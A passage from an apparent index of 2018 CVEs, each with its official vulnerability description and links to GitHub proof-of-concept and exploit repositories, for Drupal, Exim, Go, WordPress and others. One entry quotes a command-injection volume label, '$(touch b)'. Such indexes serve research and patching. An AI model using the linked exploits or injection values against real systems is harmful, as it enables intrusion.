- [db44k/CVE-2018-5767-AC9](https://github.com/db44k/CVE-2018-5767-AC9)
- [Scorpion-Security-Labs/CVE-2018-5767-AC9](https://github.com/Scorpion-Security-Labs/CVE-2018-5767-AC9)

### CVE-2018-5873 (2018-07-06)

An issue was discovered in the __ns_get_path function in fs/nsfs.c in the Linux kernel before 4.11. Due to a race condition when accessing files, a Use After Free condition can occur. This also affects all Android releases from CAF using the Linux kernel (Android for MSM, Firefox OS for MSM, QRD Android) before security patch level 2018-07-05.

- [Trinadh465/linux-4.1.15_CVE-2018-5873](https://github.com/Trinadh465/linux-4.1.15_CVE-2018-5873)

### CVE-2018-5951 (2020-03-02)

An issue was discovered in Mikrotik RouterOS. Crafting a packet that has a size of 1 byte and sending it to an IPv6 address of a RouterOS box with IP Protocol 97 will cause RouterOS to reboot imminently. All versions of RouterOS that support EoIPv6 are vulnerable to this attack.

- [Nat-Lab/CVE-2018-5951](https://github.com/Nat-Lab/CVE-2018-5951)

### CVE-2018-5955 (2018-01-21)

An issue was discovered in GitStack through 2.3.10. User controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the server via the username and password fields to the rest/user/ URI.

- [b0bac/GitStackRCE](https://github.com/b0bac/GitStackRCE)
- [YagamiiLight/Cerberus](https://github.com/YagamiiLight/Cerberus)
- [MikeTheHash/CVE-2018-5955](https://github.com/MikeTheHash/CVE-2018-5955)

### CVE-2018-6065 (2018-11-14)

Integer overflow in computing the required allocation size when instantiating a new javascript object in V8 in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [b1tg/CVE-2018-6065-exploit](https://github.com/b1tg/CVE-2018-6065-exploit)

### CVE-2018-6066 (2018-11-14)

Lack of CORS checking by ResourceFetcher/ResourceLoader in Blink in Google Chrome prior to 65.0.3325.146 allowed a remote attacker to leak cross-origin data via a crafted HTML page.

- [DISREL/Ring0VBA](https://github.com/DISREL/Ring0VBA)

### CVE-2018-6242 (2018-05-01)

Some NVIDIA Tegra mobile processors released prior to 2016 contain a buffer overflow vulnerability in BootROM Recovery Mode (RCM). An attacker with physical access to the device's USB and the ability to force the device to reboot into RCM could exploit the vulnerability to execute unverified code.

- [DavidBuchanan314/NXLoader](https://github.com/DavidBuchanan314/NXLoader)
- [reswitched/rcm-modchips](https://github.com/reswitched/rcm-modchips)
- [ChrisFigura/react-tegra-payload-launcher](https://github.com/ChrisFigura/react-tegra-payload-launcher)
- [austinhartzheim/fusee-gelee](https://github.com/austinhartzheim/fusee-gelee)
- [Swiftloke/fusee-toy](https://github.com/Swiftloke/fusee-toy)

### CVE-2018-6341 (2018-12-31)

React applications which rendered to HTML using the ReactDOMServer API were not escaping user-supplied attribute names at render-time. That lack of escaping could lead to a cross-site scripting vulnerability. This issue affected minor releases 16.0.x, 16.1.x, 16.2.x, 16.3.x, and 16.4.x. It was fixed in 16.0.1, 16.1.2, 16.2.1, 16.3.3, and 16.4.2.

- [diwangs/react16-ssr](https://github.com/diwangs/react16-ssr)

### CVE-2018-6376 (2018-01-30)

In Joomla! before 3.8.4, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the Hathor postinstall message.

- [knqyf263/CVE-2018-6376](https://github.com/knqyf263/CVE-2018-6376)

### CVE-2018-6389 (2018-02-06)

In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.

- [yolabingo/wordpress-fix-cve-2018-6389](https://github.com/yolabingo/wordpress-fix-cve-2018-6389)
- [safebuffer/CVE-2018-6389](https://github.com/safebuffer/CVE-2018-6389)
- [rastating/modsecurity-cve-2018-6389](https://github.com/rastating/modsecurity-cve-2018-6389)
- [knqyf263/CVE-2018-6389](https://github.com/knqyf263/CVE-2018-6389)
- [JulienGadanho/cve-2018-6389-php-patcher](https://github.com/JulienGadanho/cve-2018-6389-php-patcher)
- [dsfau/wordpress-CVE-2018-6389](https://github.com/dsfau/wordpress-CVE-2018-6389)
- [Jetserver/CVE-2018-6389-FIX](https://github.com/Jetserver/CVE-2018-6389-FIX)
- [thechrono13/PoC---CVE-2018-6389](https://github.com/thechrono13/PoC---CVE-2018-6389)
- [BlackRouter/cve-2018-6389](https://github.com/BlackRouter/cve-2018-6389)
- [alessiogilardi/PoC---CVE-2018-6389](https://github.com/alessiogilardi/PoC---CVE-2018-6389)
- [JavierOlmedo/wordpress-cve-2018-6389](https://github.com/JavierOlmedo/wordpress-cve-2018-6389)
- [m3ssap0/wordpress_cve-2018-6389](https://github.com/m3ssap0/wordpress_cve-2018-6389)
- [s0md3v/Shiva](https://github.com/s0md3v/Shiva)
- [mudhappy/Wordpress-Hack-CVE-2018-6389](https://github.com/mudhappy/Wordpress-Hack-CVE-2018-6389)
- [armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389](https://github.com/armaanpathan12345/WP-DOS-Exploit-CVE-2018-6389)
- [ItinerisLtd/trellis-cve-2018-6389](https://github.com/ItinerisLtd/trellis-cve-2018-6389)
- [Zazzzles/Wordpress-DOS](https://github.com/Zazzzles/Wordpress-DOS)
- [fakedob/tvsz](https://github.com/fakedob/tvsz)
- [vineetkia/Wordpress-DOS-Attack-CVE-2018-6389](https://github.com/vineetkia/Wordpress-DOS-Attack-CVE-2018-6389)
- [ianxtianxt/CVE-2018-6389](https://github.com/ianxtianxt/CVE-2018-6389)
- [amit-pathak009/CVE-2018-6389-FIX](https://github.com/amit-pathak009/CVE-2018-6389-FIX)

### CVE-2018-6396 (2018-02-17)

SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.

- [JavierOlmedo/joomla-cve-2018-6396](https://github.com/JavierOlmedo/joomla-cve-2018-6396)

### CVE-2018-6407 (2018-01-30)

An issue was discovered on Conceptronic CIPCAMPTIWL V3 0.61.30.21 devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to /hy-cgi/devices.cgi?cmd=searchlandevice. The crash completely freezes the device.

- [dreadlocked/ConceptronicIPCam_MultipleVulnerabilities](https://github.com/dreadlocked/ConceptronicIPCam_MultipleVulnerabilities)

### CVE-2018-6479 (2018-01-31)

An issue was discovered on Netwave IP Camera devices. An unauthenticated attacker can crash a device by sending a POST request with a huge body size to the / URI.

- [dreadlocked/netwave-dosvulnerability](https://github.com/dreadlocked/netwave-dosvulnerability)
- [LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479](https://github.com/LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479)

### CVE-2018-6518 (2018-04-26)

Composr CMS 10.0.13 has XSS via the site_name parameter in a page=admin-setupwizard&type=step3 request to /adminzone/index.php.

- [faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS](https://github.com/faizzaidi/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS)

### CVE-2018-6546 (2018-04-13)

plays_service.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, executes code at a user-defined (local or SMB) path as SYSTEM when the execute_installer parameter is used in an HTTP message. This occurs without properly authenticating the user.

- [securifera/CVE-2018-6546-Exploit](https://github.com/securifera/CVE-2018-6546-Exploit)

### CVE-2018-6574 (2018-02-07)

Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.

- [acole76/cve-2018-6574](https://github.com/acole76/cve-2018-6574)
- [neargle/Go-Get-RCE-CVE-2018-6574-POC](https://github.com/neargle/Go-Get-RCE-CVE-2018-6574-POC)
- [wb4r/go-get-rce](https://github.com/wb4r/go-get-rce)
- [ahmetmanga/go-get-rce](https://github.com/ahmetmanga/go-get-rce)
- [ahmetmanga/cve-2018-6574](https://github.com/ahmetmanga/cve-2018-6574)
- [redirected/cve-2018-6574](https://github.com/redirected/cve-2018-6574)
- [20matan/CVE-2018-6574-POC](https://github.com/20matan/CVE-2018-6574-POC)
- [zur250/Zur-Go-GET-RCE-Solution](https://github.com/zur250/Zur-Go-GET-RCE-Solution)
- [mekhalleh/cve-2018-6574](https://github.com/mekhalleh/cve-2018-6574)
- [veter069/go-get-rce](https://github.com/veter069/go-get-rce)
- [duckzsc2/CVE-2018-6574-POC](https://github.com/duckzsc2/CVE-2018-6574-POC)
- [dollyptm/cve-2018-6574](https://github.com/dollyptm/cve-2018-6574)
- [qweraqq/CVE-2018-6574](https://github.com/qweraqq/CVE-2018-6574)
- [d4rkshell/go-get-rce](https://github.com/d4rkshell/go-get-rce)
- [chaosura/CVE-2018-6574](https://github.com/chaosura/CVE-2018-6574)
- [french560/ptl6574](https://github.com/french560/ptl6574)
- [InfoSecJack/CVE-2018-6574](https://github.com/InfoSecJack/CVE-2018-6574)
- [asavior2/CVE-2018-6574](https://github.com/asavior2/CVE-2018-6574)
- [drset/golang](https://github.com/drset/golang)
- [frozenkp/CVE-2018-6574](https://github.com/frozenkp/CVE-2018-6574)
- [kev-ho/cve-2018-6574-payload](https://github.com/kev-ho/cve-2018-6574-payload)
- [sdosis/cve-2018-6574](https://github.com/sdosis/cve-2018-6574)
- [No1zy/CVE-2018-6574-PoC](https://github.com/No1zy/CVE-2018-6574-PoC)
- [nthuong95/CVE-2018-6574](https://github.com/nthuong95/CVE-2018-6574)
- [AdriVillaB/CVE-2018-6574](https://github.com/AdriVillaB/CVE-2018-6574)
- [yitingfan/CVE-2018-6574_demo](https://github.com/yitingfan/CVE-2018-6574_demo)
- [mhamed366/CVE-2018-6574](https://github.com/mhamed366/CVE-2018-6574)
- [Eugene24/CVE-2018-6574](https://github.com/Eugene24/CVE-2018-6574)
- [coblax/CVE-2018-6574](https://github.com/coblax/CVE-2018-6574)
- [darthvader-htb/CVE-2018-6574](https://github.com/darthvader-htb/CVE-2018-6574)
- [it3x55/CVE-2018-6574](https://github.com/it3x55/CVE-2018-6574)
- [Malone5923/CVE-2018-6574-go-get-RCE](https://github.com/Malone5923/CVE-2018-6574-go-get-RCE)
- [illnino/CVE-2018-6574](https://github.com/illnino/CVE-2018-6574)
- [TakuCoder/CVE-2018-6574](https://github.com/TakuCoder/CVE-2018-6574)
- [kawkab101/cve-2018-6574](https://github.com/kawkab101/cve-2018-6574)
- [lsnakazone/cve-2018-6574](https://github.com/lsnakazone/cve-2018-6574)
- [pswalia2u/CVE-2018-6574](https://github.com/pswalia2u/CVE-2018-6574)
- [jongmartinez/CVE-2018-6574-POC](https://github.com/jongmartinez/CVE-2018-6574-POC)
- [azzzzzzzzzzzzzzzzz/CVE-2018-6574](https://github.com/azzzzzzzzzzzzzzzzz/CVE-2018-6574)
- [noname-nohost/CVE-2018-6574](https://github.com/noname-nohost/CVE-2018-6574)
- [shadofren/CVE-2018-6574](https://github.com/shadofren/CVE-2018-6574)
- [NikolaT3sla/cve-2018-6574](https://github.com/NikolaT3sla/cve-2018-6574)
- [vishack/CVE-2018-6574](https://github.com/vishack/CVE-2018-6574)
- [PLP-Orange/cve-2018-6574-exercise](https://github.com/PLP-Orange/cve-2018-6574-exercise)
- [purgedemo/CVE-2018-6574](https://github.com/purgedemo/CVE-2018-6574)
- [purgedemo/CVE-2018-6574_2](https://github.com/purgedemo/CVE-2018-6574_2)
- [killtr0/POC-CVE-2018-6574](https://github.com/killtr0/POC-CVE-2018-6574)
- [theJuan1112/pentesterlab-cve-2018-6574](https://github.com/theJuan1112/pentesterlab-cve-2018-6574)
- [MohamedTarekq/test-CVE-2018-6574-](https://github.com/MohamedTarekq/test-CVE-2018-6574-)
- [OLAOLAOLA789/CVE-2018-6574](https://github.com/OLAOLAOLA789/CVE-2018-6574)
- [repos13579/labCVE-2018-6574](https://github.com/repos13579/labCVE-2018-6574)
- [sec000/cve-2018-6574](https://github.com/sec000/cve-2018-6574)
- [jaya522/CVE-2018-6574-go-get-RCE](https://github.com/jaya522/CVE-2018-6574-go-get-RCE)
- [noobTest1122/CVE-2018-6574](https://github.com/noobTest1122/CVE-2018-6574)
- [ErnestZiemkowski/cve-2018-6574](https://github.com/ErnestZiemkowski/cve-2018-6574)
- [l3ouu4n9/CVE-2018-6574-POC](https://github.com/l3ouu4n9/CVE-2018-6574-POC)
- [R3dAlch3mist/cve-2018-6574](https://github.com/R3dAlch3mist/cve-2018-6574)
- [Devang-Solanki/CVE-2018-6574](https://github.com/Devang-Solanki/CVE-2018-6574)
- [ItsFadinG/CVE-2018-6574](https://github.com/ItsFadinG/CVE-2018-6574)
- [imojne/CVE-2018-6574-POC](https://github.com/imojne/CVE-2018-6574-POC)
- [twseptian/cve-2018-6574](https://github.com/twseptian/cve-2018-6574)
- [the-valluvarsploit/CVE-2018-6574](https://github.com/the-valluvarsploit/CVE-2018-6574)
- [yavolo/CVE-2018-6574](https://github.com/yavolo/CVE-2018-6574)
- [jftierno/CVE-2018-6574](https://github.com/jftierno/CVE-2018-6574)
- [Cypheer/exploit_CVE-2018-6574](https://github.com/Cypheer/exploit_CVE-2018-6574)
- [jftierno/CVE-2018-6574-2](https://github.com/jftierno/CVE-2018-6574-2)
- [tjcim/cve-2018-6574](https://github.com/tjcim/cve-2018-6574)
- [markisback/CVE-2018-6574](https://github.com/markisback/CVE-2018-6574)
- [hasharmujahid/CVE-2018-6574-go-get-RCE](https://github.com/hasharmujahid/CVE-2018-6574-go-get-RCE)
- [jeyaseelans86/CVE-2018-6574](https://github.com/jeyaseelans86/CVE-2018-6574)
- [jeyaseelans86/new-CVE-2018-6574](https://github.com/jeyaseelans86/new-CVE-2018-6574)
- [chr1sM/CVE-2018-6574](https://github.com/chr1sM/CVE-2018-6574)
- [mux0x/CVE-2018-6574](https://github.com/mux0x/CVE-2018-6574)
- [seoqqq/CVE-2018-6574](https://github.com/seoqqq/CVE-2018-6574)
- [antunesmpedro/CVE-2018-6574](https://github.com/antunesmpedro/CVE-2018-6574)
- [jahwni/CVE-2018-6574](https://github.com/jahwni/CVE-2018-6574)
- [NsByte/CVE-2018-6574](https://github.com/NsByte/CVE-2018-6574)
- [Zeeshan12340/CVE-2018-6574](https://github.com/Zeeshan12340/CVE-2018-6574)
- [moTorky/CVE-2018-6574-POC](https://github.com/moTorky/CVE-2018-6574-POC)
- [Ashved9/Orange](https://github.com/Ashved9/Orange)
- [zerbaliy3v/cve-2018-6574-exploit](https://github.com/zerbaliy3v/cve-2018-6574-exploit)
- [jftierno/-CVE-2018-6574](https://github.com/jftierno/-CVE-2018-6574)
- [faiqu3/cve-2018-6574](https://github.com/faiqu3/cve-2018-6574)
- [Dannners/CVE-2018-6574-go-get-RCE](https://github.com/Dannners/CVE-2018-6574-go-get-RCE)
- [bme2003/CVE-2018-6574](https://github.com/bme2003/CVE-2018-6574)
- [iNoSec2/cve-2018-6574](https://github.com/iNoSec2/cve-2018-6574)
- [ttyA0/cve-2018-6574](https://github.com/ttyA0/cve-2018-6574)
- [faqihudin13/CVE-2018-6574](https://github.com/faqihudin13/CVE-2018-6574)
- [lisu60/cve-2018-6574](https://github.com/lisu60/cve-2018-6574)
- [Saboor-Hakimi/CVE-2018-6574](https://github.com/Saboor-Hakimi/CVE-2018-6574)

### CVE-2018-6622 (2018-08-17)

An issue was discovered that affects all producers of BIOS firmware who make a certain realistic interpretation of an obscure portion of the Trusted Computing Group (TCG) Trusted Platform Module (TPM) 2.0 specification. An abnormal case is not handled properly by this firmware during S3 sleep and can clear TPM 2.0. It allows local users to overwrite static PCRs of the TPM and neutralize its security features, such as seal/unseal and remote attestation.

- [kkamagui/napper-for-tpm](https://github.com/kkamagui/napper-for-tpm)

### CVE-2018-6643 (2018-08-28)

Infoblox NetMRI 7.1.1 has Reflected Cross-Site Scripting via the /api/docs/index.php query parameter.

- [undefinedmode/CVE-2018-6643](https://github.com/undefinedmode/CVE-2018-6643)

### CVE-2018-6789 (2018-02-08)

An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. A handcrafted message can trigger a buffer overflow, which can be used to execute code remotely.

- [c0llision/exim-vuln-poc](https://github.com/c0llision/exim-vuln-poc)
- [beraphin/CVE-2018-6789](https://github.com/beraphin/CVE-2018-6789)
- [synacktiv/Exim-CVE-2018-6789](https://github.com/synacktiv/Exim-CVE-2018-6789)
- [martinclauss/exim-rce-cve-2018-6789](https://github.com/martinclauss/exim-rce-cve-2018-6789)
- [thistehneisen/CVE-2018-6789-Python3](https://github.com/thistehneisen/CVE-2018-6789-Python3)

### CVE-2018-6791 (2018-02-07)

An issue was discovered in soliduiserver/deviceserviceaction.cpp in KDE Plasma Workspace before 5.12.0. When a vfat thumbdrive that contains \`\` or $() in its volume label is plugged in and mounted through the device notifier, it's interpreted as a shell command, leading to a possibility of arbitrary command execution. An example of an offending volume label is "$(touch b)" -- this will create a file called b in the home folder.

- [rarar0/KDE_Vuln](https://github.com/rarar0/KDE_Vuln)

### CVE-2018-6890 (2018-02-22)

Cross-site scripting (XSS) vulnerability in Wolf CMS 0.8.3.1 via the page editing feature, as demonstrated by /?/admin/page/edit/3.

- [pradeepjairamani/WolfCMS-XSS-POC](https://github.com/pradeepjairamani/WolfCMS-XSS-POC)

### CVE-2018-6892 (2018-02-11)

An issue was discovered in CloudMe before 1.11.0. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.

- [manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/CloudMe-Sync-1.10.9---Buffer-Overflow-SEH-DEP-Bypass)
- [manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass)
- [latortuga71/CVE-2018-6892-Golang](https://github.com/latortuga71/CVE-2018-6892-Golang)

### CVE-2018-6905 (2018-04-08)

The page module in TYPO3 before 8.7.11, and 9.1.0, has XSS via $GLOBALS['TYPO3_CONF_VARS']['SYS']['sitename'], as demonstrated by an admin entering a crafted site name during the installation process.

- [pradeepjairamani/TYPO3-XSS-POC](https://github.com/pradeepjairamani/TYPO3-XSS-POC)
- [dnr6419/CVE-2018-6905](https://github.com/dnr6419/CVE-2018-6905)

### CVE-2018-6961 (2018-06-11)

VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution.

- [bokanrb/CVE-2018-6961](https://github.com/bokanrb/CVE-2018-6961)
- [r3dxpl0it/CVE-2018-6961](https://github.com/r3dxpl0it/CVE-2018-6961)

### CVE-2018-6981 (2018-12-04)

VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host.

- [LxKxC/vmxnet3Hunter](https://github.com/LxKxC/vmxnet3Hunter)

### CVE-2018-7171 (2018-03-30)

Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.

- [mechanico/sharingIsCaring](https://github.com/mechanico/sharingIsCaring)

### CVE-2018-7197 (2018-02-18)

An issue was discovered in Pluck through 4.7.4. A stored cross-site scripting (XSS) vulnerability allows remote unauthenticated users to inject arbitrary web script or HTML into admin/blog Reaction Comments via a crafted URL.

- [Alyssa-o-Herrera/CVE-2018-7197](https://github.com/Alyssa-o-Herrera/CVE-2018-7197)

### CVE-2018-7211 (2018-02-18)

An issue was discovered in iDashboards 9.6b. The SSO implementation is affected by a weak obfuscation library, allowing man-in-the-middle attackers to discover credentials.

- [c3r34lk1ll3r/CVE-2018-7211-PoC](https://github.com/c3r34lk1ll3r/CVE-2018-7211-PoC)

### CVE-2018-7249 (2018-02-26)

An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. Two carefully timed calls to IOCTL 0xCA002813 can cause a race condition that leads to a use-after-free. When exploited, an unprivileged attacker can run arbitrary code in the kernel.

- [Elvin9/NotSecDrv](https://github.com/Elvin9/NotSecDrv)

### CVE-2018-7250 (2018-02-26)

An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. An uninitialized kernel pool allocation in IOCTL 0xCA002813 allows a local unprivileged attacker to leak 16 bits of uninitialized kernel PagedPool data.

- [Elvin9/SecDrvPoolLeak](https://github.com/Elvin9/SecDrvPoolLeak)

### CVE-2018-7273 (2018-02-21)

In the Linux kernel through 4.15.4, the floppy driver reveals the addresses of kernel functions and global variables using printk calls within the function show_floppy in drivers/block/floppy.c. An attacker can read this information from dmesg and use the addresses to find the locations of kernel code and data and bypass kernel security protections such as KASLR.

- [jedai47/CVE-2018-7273](https://github.com/jedai47/CVE-2018-7273)

### CVE-2018-7284 (2018-02-22)

A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash.

- [Rodrigo-D/astDoS](https://github.com/Rodrigo-D/astDoS)

### CVE-2018-7422 (2018-03-19)

A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absolute path traversal.

- [0x00-0x00/CVE-2018-7422](https://github.com/0x00-0x00/CVE-2018-7422)
- [jessisec/CVE-2018-7422](https://github.com/jessisec/CVE-2018-7422)
- [JacobEbben/CVE-2018-7422](https://github.com/JacobEbben/CVE-2018-7422)

### CVE-2018-7448 (2018-02-26)

Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.

- [b1d0ws/exploit-cve-2018-7448](https://github.com/b1d0ws/exploit-cve-2018-7448)

### CVE-2018-7449 (2018-03-04)

SEGGER FTP Server for Windows before 3.22a allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.

- [antogit-sys/CVE-2018-7449](https://github.com/antogit-sys/CVE-2018-7449)

### CVE-2018-7489 (2018-02-26)

FasterXML jackson-databind before 2.7.9.3, 2.8.x before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.

- [tafamace/CVE-2018-7489](https://github.com/tafamace/CVE-2018-7489)

### CVE-2018-7490 (2018-02-26)

uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.

- [qinzhu111/uWSGI-CVE-2018-7490-POC](https://github.com/qinzhu111/uWSGI-CVE-2018-7490-POC)

### CVE-2018-7600 (2018-03-29)

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

- [g0rx/CVE-2018-7600-Drupal-RCE](https://github.com/g0rx/CVE-2018-7600-Drupal-RCE)
- [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600)
- [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)
- [knqyf263/CVE-2018-7600](https://github.com/knqyf263/CVE-2018-7600)
- [dr-iman/CVE-2018-7600-Drupal-0day-RCE](https://github.com/dr-iman/CVE-2018-7600-Drupal-0day-RCE)
- [jirojo2/drupalgeddon2](https://github.com/jirojo2/drupalgeddon2)
- [dwisiswant0/CVE-2018-7600](https://github.com/dwisiswant0/CVE-2018-7600)
- [thehappydinoa/CVE-2018-7600](https://github.com/thehappydinoa/CVE-2018-7600)
- [sl4cky/CVE-2018-7600](https://github.com/sl4cky/CVE-2018-7600)
- [sl4cky/CVE-2018-7600-Masschecker](https://github.com/sl4cky/CVE-2018-7600-Masschecker)
- [firefart/CVE-2018-7600](https://github.com/firefart/CVE-2018-7600)
- [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600)
- [lorddemon/drupalgeddon2](https://github.com/lorddemon/drupalgeddon2)
- [Hestat/drupal-check](https://github.com/Hestat/drupal-check)
- [Damian972/drupalgeddon-2](https://github.com/Damian972/drupalgeddon-2)
- [soch4n/CVE-2018-7600](https://github.com/soch4n/CVE-2018-7600)
- [happynote3966/CVE-2018-7600](https://github.com/happynote3966/CVE-2018-7600)
- [shellord/CVE-2018-7600-Drupal-RCE](https://github.com/shellord/CVE-2018-7600-Drupal-RCE)
- [r3dxpl0it/CVE-2018-7600](https://github.com/r3dxpl0it/CVE-2018-7600)
- [cved-sources/cve-2018-7600](https://github.com/cved-sources/cve-2018-7600)
- [madneal/codeql-scanner](https://github.com/madneal/codeql-scanner)
- [drugeddon/drupal-exploit](https://github.com/drugeddon/drupal-exploit)
- [shellord/Drupalgeddon-Mass-Exploiter](https://github.com/shellord/Drupalgeddon-Mass-Exploiter)
- [zhzyker/CVE-2018-7600-Drupal-POC-EXP](https://github.com/zhzyker/CVE-2018-7600-Drupal-POC-EXP)
- [rabbitmask/CVE-2018-7600-Drupal7](https://github.com/rabbitmask/CVE-2018-7600-Drupal7)
- [ynsmroztas/drupalhunter](https://github.com/ynsmroztas/drupalhunter)
- [ruthvikvegunta/Drupalgeddon2](https://github.com/ruthvikvegunta/Drupalgeddon2)
- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE)
- [0xAJ2K/CVE-2018-7600](https://github.com/0xAJ2K/CVE-2018-7600)
- [rafaelcaria/drupalgeddon2-CVE-2018-7600](https://github.com/rafaelcaria/drupalgeddon2-CVE-2018-7600)
- [vphnguyen/ANM_CVE-2018-7600](https://github.com/vphnguyen/ANM_CVE-2018-7600)
- [0xConstant/CVE-2018-7600](https://github.com/0xConstant/CVE-2018-7600)
- [anldori/CVE-2018-7600](https://github.com/anldori/CVE-2018-7600)
- [r0lh/CVE-2018-7600](https://github.com/r0lh/CVE-2018-7600)
- [killeveee/CVE-2018-7600](https://github.com/killeveee/CVE-2018-7600)
- [raytran54/CVE-2018-7600](https://github.com/raytran54/CVE-2018-7600)

### CVE-2018-7602 (2018-07-19)

A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.

- [1337g/Drupalgedon3](https://github.com/1337g/Drupalgedon3)
- [happynote3966/CVE-2018-7602](https://github.com/happynote3966/CVE-2018-7602)
- [kastellanos/CVE-2018-7602](https://github.com/kastellanos/CVE-2018-7602)
- [cyberharsh/DrupalCVE-2018-7602](https://github.com/cyberharsh/DrupalCVE-2018-7602)
- [132231g/CVE-2018-7602](https://github.com/132231g/CVE-2018-7602)

### CVE-2018-7669 (2018-04-27)

An issue was discovered in Sitecore Sitecore.NET 8.1 rev. 151207 Hotfix 141178-1 and above. The 'Log Viewer' application is vulnerable to a directory traversal attack, allowing an attacker to access arbitrary files from the host Operating System using a sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file= URI. Validation is performed to ensure that the text passed to the 'file' parameter correlates to the correct log file directory. This filter can be bypassed by including a valid log filename and then appending a traditional 'dot dot' style attack.

- [palaziv/CVE-2018-7669](https://github.com/palaziv/CVE-2018-7669)

### CVE-2018-7690 (2018-12-13)

A potential Remote Unauthorized Access vulnerability in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, and 18.10, could allow remote unauthorized access.

- [alt3kx/CVE-2018-7690](https://github.com/alt3kx/CVE-2018-7690)

### CVE-2018-7691 (2018-12-13)

A potential Remote Unauthorized Access vulnerability in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, and 18.10, could allow remote unauthorized access.

- [alt3kx/CVE-2018-7691](https://github.com/alt3kx/CVE-2018-7691)

### CVE-2018-7747 (2018-04-20)

Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log, or (3) an imported form.

- [mindpr00f/CVE-2018-7747](https://github.com/mindpr00f/CVE-2018-7747)

### CVE-2018-7750 (2018-03-13)

transport.py in the SSH server implementation of Paramiko before 1.17.6, 1.18.x before 1.18.5, 2.0.x before 2.0.8, 2.1.x before 2.1.5, 2.2.x before 2.2.3, 2.3.x before 2.3.2, and 2.4.x before 2.4.1 does not properly check whether authentication is completed before processing other requests, as demonstrated by channel-open. A customized SSH client can simply skip the authentication step.

- [jm33-m0/CVE-2018-7750](https://github.com/jm33-m0/CVE-2018-7750)

### CVE-2018-7842 (2019-05-22)

